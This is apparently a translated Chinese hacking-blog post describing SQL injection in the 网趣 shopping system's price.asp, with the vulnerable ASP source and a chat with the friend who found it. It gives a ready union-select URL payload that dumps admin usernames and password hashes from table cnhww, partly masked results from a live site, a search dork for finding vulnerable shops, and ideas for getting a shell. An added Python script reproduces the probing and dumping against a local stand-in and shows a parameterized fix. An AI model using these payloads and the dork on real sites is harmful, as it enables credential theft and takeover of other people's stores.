西宁威势
It's the weekend and I slept until noon. As soon as I got online I saw a message from my QQ friend 辐射鱼 asking me to test a script vulnerability.

辐射鱼 13:01:03
Wait while I find a target.
辐射鱼 13:03:48
https://www.webshell.cc/price.asp?anid=62%20and%20exists%20(select%20*%20from%20cnhww)
辐射鱼 13:04:41
Table cnhww. Why doesn't it support order by?
辐射鱼 13:05:06
https://www.webshell.cc/price.asp?anid=62%20order%20by%201
辐射鱼 13:05:29
password/admin


I then tested it by hand a few times and confirmed the vulnerability was real. I asked him for the source code and the database, and once I had read them it was not hard to understand, because price.asp concatenates the anid parameter straight into the query, with no numeric check and no filtering:

price.asp

rs.open "select * from products where  anclassid="&anid&" order by adddate desc",conn,1,1


Constructed payload:

https://www.webshell.cc/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww


That dumped the admin username and password. Two details make the payload work. First, `and 1=2` empties the legitimate product rows, so only the union half of the result is rendered. Second, the union must have exactly as many columns as the products table (50 here, since the 50-column union succeeded), with admin placed in the first slot, which the page renders as the product number, and password in slot 28, which the page renders as the member price. Ordinary `order by N` column counting does not work against this script because price.asp appends its own `order by adddate desc` after the injected text, so `62 order by 1` becomes `... order by 1 order by adddate desc`, a syntax error; the column count has to be found by growing the union until the query stops failing.
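To make the mechanism concrete, here is an added example, not code from the page or from 网趣: an in-memory SQLite stand-in for the Access database, with a function that assembles the query exactly as price.asp does (parameter concatenated in, `order by adddate desc` appended by the script). Only the names products, cnhww, anclassid, adddate, admin and password come from the page; every other column name and every row is an assumption, and products is kept to 5 columns instead of 50 so the probe stays short. It shows the `exists()` check from the chat, why `order by 1` fails here, counting columns by growing the union, the admin/password dump, and the parameterized fix that rejects the same payloads.

```python
import sqlite3

# Constructed in-memory stand-in for the Access file behind price.asp.
# Only products, cnhww, anclassid, adddate, admin and password come from
# the page; every other name and every row is an assumption. products is
# kept to 5 columns (the real one needed 50) so the probe stays short.
SCHEMA = """
create table products (bookid integer, anclassid integer, name text,
                       price real, adddate text);
create table cnhww (id integer, admin text, password text);
insert into products values (1, 62, 'widget', 15.0, '2009-11-01');
insert into products values (2, 62, 'gadget', 20.0, '2009-11-02');
insert into products values (3, 7,  'other',   1.0, '2009-10-01');
-- constructed admin row; the stored value is simply md5('admin')
insert into cnhww values (1, 'admin', '21232f297a57a5a743894a0e4a801fc3');
"""


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_price_query(conn, anid: str) -> list:
    """Same shape as price.asp: anid is concatenated into the WHERE clause and
    the script appends its own ' order by adddate desc' afterwards."""
    sql = "select * from products where anclassid=" + anid + " order by adddate desc"
    return conn.execute(sql).fetchall()


def table_exists(conn, table: str) -> bool:
    """The 'and exists (select * from cnhww)' check from the chat: a missing
    table makes the query fail, an existing one leaves the listing intact."""
    try:
        rows = vulnerable_price_query(conn, f"62 and exists (select * from {table})")
    except sqlite3.OperationalError:
        return False
    return len(rows) > 0


def order_by_probe_fails(conn) -> bool:
    """Why '62 order by 1' did not work: the injected ORDER BY lands in front of
    the script's own ORDER BY, and two ORDER BY clauses are a syntax error."""
    try:
        vulnerable_price_query(conn, "62 order by 1")
    except sqlite3.OperationalError:
        return True
    return False


def find_union_width(conn, max_cols: int = 60):
    """Count columns the way the page did: grow 'union select 1,2,...' until
    the database stops rejecting the column-count mismatch."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            vulnerable_price_query(conn, f"62 and 1=2 union select {cols} from cnhww")
        except sqlite3.OperationalError:
            continue
        return n
    return None


def dump_admins(conn, width: int) -> list:
    """The page's payload: 'and 1=2' empties the product rows, admin goes in
    the first slot and password in a displayed slot (here the last one)."""
    slots = [str(i) for i in range(1, width + 1)]
    slots[0], slots[-1] = "admin", "password"
    payload = f"62 and 1=2 union select {','.join(slots)} from cnhww"
    return [(row[0], row[-1]) for row in vulnerable_price_query(conn, payload)]


def safe_price_query(conn, anid: str) -> list:
    """Fix: reject anything that is not an integer (as products.asp does for
    id) and bind the value instead of concatenating it."""
    if not anid.isdigit():
        raise ValueError("anid must be an integer")
    sql = "select * from products where anclassid=? order by adddate desc"
    return conn.execute(sql, (int(anid),)).fetchall()


def is_rejected(conn, anid: str) -> bool:
    """True if the hardened query refuses the parameter."""
    try:
        safe_price_query(conn, anid)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_db()
    print("cnhww exists:", table_exists(db, "cnhww"))
    print("'order by 1' fails:", order_by_probe_fails(db))
    width = find_union_width(db)
    print("union width:", width)
    print("dumped:", dump_admins(db, width))
    print("hardened rejects payload:",
          is_rejected(db, "62 and 1=2 union select admin,2,3,4,password from cnhww"))
```

Against the 5-column stand-in the probe settles at width 5 and the dump returns the constructed admin row; against the real site the same loop would run to 50. The fix does two independent things, and both matter: the `isdigit()` check is what products.asp already does with IsNumeric, and binding the value with `?` means that even a parameter that slips past validation is compared as data rather than parsed as SQL.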

Product No.    Product name   Member price        Current stock   Spec   Spec parameters
weih**cheye    15             7a57a5a7438**aac    36              23     View details
wei**cheye     15             b2ea44b2cf0**bdb    36              23     View details
纬**业         15             88121ef9c5a**5f9    36              23     View details


The results above are partially masked with * because they contain sensitive information. Since this was only a favour, I stopped at that point. Afterwards 辐射鱼 wrote the whole process up as an article, which I paste below; dig into it if you are interested.

网趣网上购物系统时尚版 (latest version)

I skimmed the source. The front end generally has no injection. The database's default extension is .asp, so one option is to register a front-end user and insert a trojan into the database.

My approach:

1. Analyze the source.

2. Insert a trojan into the database.

3. Look for upload-type files and analyze them.

4. Analyze exploitation of the back end.

…………………………………………

Set up IIS locally and test.

Submit an arbitrary id with a ' appended and see whether there is injection.

Submitting ID=XXX' returns to the home page.

Products.asp

<html>
<head>
<!--#include file="conn.asp"-->
<!--#include file="config.asp"-->
<!--#include file="./alipay_inc/myAlipay.asp"-->
<!--#include file="./alipay_inc/alipay_Config.asp"-->
<title><%=webname%>--商品详细信息</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="description" content="网趣网上购物系统,网趣网上购物系统时尚版,网趣购物系统,网上购物系统,购物系统,网趣购物,商城源码,网上商店,网上商店系统,域名注册,虚拟主机,恒伟网络">
<meta name="keywords" content="网趣网上购物系统,网趣网上购物系统时尚版,网趣购物系统,网上购物系统,购物系统,网趣购物,商城源码,网上商店,网上商店系统,域名注册,虚拟主机,恒伟网络">
<link href="images/css.css" rel="stylesheet" type="text/css">
</head>
<script language="JavaScript">
<!--
function OpenNews()
{
    window.name = "news"
    win = window.open('','newswin','left=110,width=600,height=420,scrollbars=1');
}
//-->
</script>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" >
<%
' First guard: id must be numeric, otherwise alert "非法访问" (illegal access) and bounce to index.asp
if IsNumeric(request.QueryString("id"))=False then
response.write("<script>alert(""非法访问!"");location.href=""index.asp"";</script>")
response.end
end if
dim id
id=request.QueryString("id")
' Second guard: isinteger() check. Note there is no response.end in this branch,
' so it is the IsNumeric check above that actually stops the request.
if not isinteger(id) then
response.write"<script>alert(""非法访问!"");location.href=""index.asp"";</script>"
end if
%>
<%
dim bookid,action
bookid=request.QueryString("id")
action=request.QueryString("action")
if action="save" then
' Review submission: text fields go through HTMLEncode2, bookid is the id validated above
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from review",conn,1,3
rs.addnew
rs("bookid")=bookid
rs("pingji")=request("pingji")
rs("pinglunname")=HTMLEncode2(trim(request("pinglunname")))
rs("pingluntitle")=HTMLEncode2(trim(request("pingluntitle")))
rs("pingluncontent")=HTMLEncode2(trim(request("pingluncontent")))
rs("ip")=Request.servervariables("REMOTE_ADDR")
rs("pinglundate")=now()
rs("shenhe")=0
rs.update
rs.close
set rs=nothing
' Update the product's rating counters
set rs=server.CreateObject("adodb.recordset")
rs.open "select * from products where bookid="&bookid,conn,1,3
rs("pingji")=rs("pingji")+1
rs("pingjizong")=rs("pingjizong")+request("pingji")
rs.update
rs.close
set rs=nothing
response.Write "<script language=javascript>alert('您的评论已成功提交,待管理员审核!');history.go(-1);</script>"
response.End
end if
%>

There is anti-injection.

It all relies on session verification, not cookies; I tested that route too, and it didn't work.

Continuing through the code.

Price.asp

<!--#include file="conn.asp"-->
<!--#include file="config.asp"-->
<html>
<head>
<title><%=webname%></title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="description" content="<%=des%>">
<meta name="keywords" content="<%=keya%>">
...... (omitted)
end if
set rs=server.CreateObject("adodb.recordset")
if anid<>"" then
' anid (read from the query string in the omitted part) is concatenated straight into the SQL,
' with none of the IsNumeric / isinteger checks that products.asp applies to id
rs.open "select * from products where  anclassid="&anid&" order by adddate desc",conn,1,1
else
select case selectm
case ""
rs.open "select * from products order by adddate desc",conn,1,1
case "0"
rs.open "select * from products order by adddate desc",conn,1,1
case "shopid"
end select
end if
' err.number is only set if On Error Resume Next was enabled in the omitted part
if err.number<>0 then
response.write "暂无相关数据!"
end if
if rs.eof And rs.bof then
Response.Write "<p align='center'>暂无相关数据!</p>"
else
totalPut=rs.recordcount
if currentpage<1 then
currentpage=1
end if
if (currentpage-1)*MaxPerPage>totalput then
if (totalPut mod MaxPerPage)=0 then
currentpage= totalPut \ MaxPerPage
else
currentpage= totalPut \ MaxPerPage + 1
end if
end if
if currentPage=1 then
showContent
showpage totalput,MaxPerPage,"Price.asp"
else
if (currentPage-1)*MaxPerPage<totalPut then
rs.move  (currentPage-1)*MaxPerPage
dim shopmark
shopmark=rs.bookmark
showContent
showpage totalput,MaxPerPage,"Price.asp"
else
currentPage=1
showContent
showpage totalput,MaxPerPage,"Price.asp"
end if
end if
end if
sub showContent
dim i
i=0
%>

No filtering.

Price.asp?anid=62;(submit a query statement)--

/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww

/admin/admin.asp

/admin/admin3.asp

<html><head><title>商城管理系统</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="../images/css.css" rel="stylesheet" type="text/css">
</head>
<body>
<%
Dim theInstalledObjects(24)

No authentication; it can be accessed directly.

2. Database.

\cnhwwdata\cnhww.asp is the default database path.

Idea: if the database path has not been changed, consider registering a front-end user to get a shell.

<%nodown%> anti-download field.

Cnhww: back-end user table.

User: front-end user table.

No need to spell this out: the anti-download field is inserted in the first row of the database, so the database-trojan route is out (a one-liner inserted from the front end won't close the tag either).

1. Getting a shell through the back end.

No filtering.

Price.asp?anid=62;(submit a query statement)--

I won't construct the statement.

Query Admin / password in the Cnhww table.

Method for getting a shell through the back end

网趣网上购物系统时尚版

Keyword

inurl:Price.asp?anid=

Exploitation method

/price.asp?anid=62%20%20and%201=2%20union%20select%20admin,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,password,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50%20from%20cnhww

Took it to the official website to test, and found they use the generic anti-injection script (通用防注入):

Quoted fragment:
Illegal operation! The system has logged the following ↓
Source IP: 123.45.67.89
Time: 2009-11-7 15:31:35
Page: /fshop/products.asp
Method: GET
Parameter: id
Data: 346 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from cnhww order by adddate desc


辐射鱼 kept testing and found that the official site had removed the back end and renamed the database tables as well, haha, so I stopped playing.

Please credit WebShell'S Blog when reprinting; this article's address: https://www.webshell.cc/148.html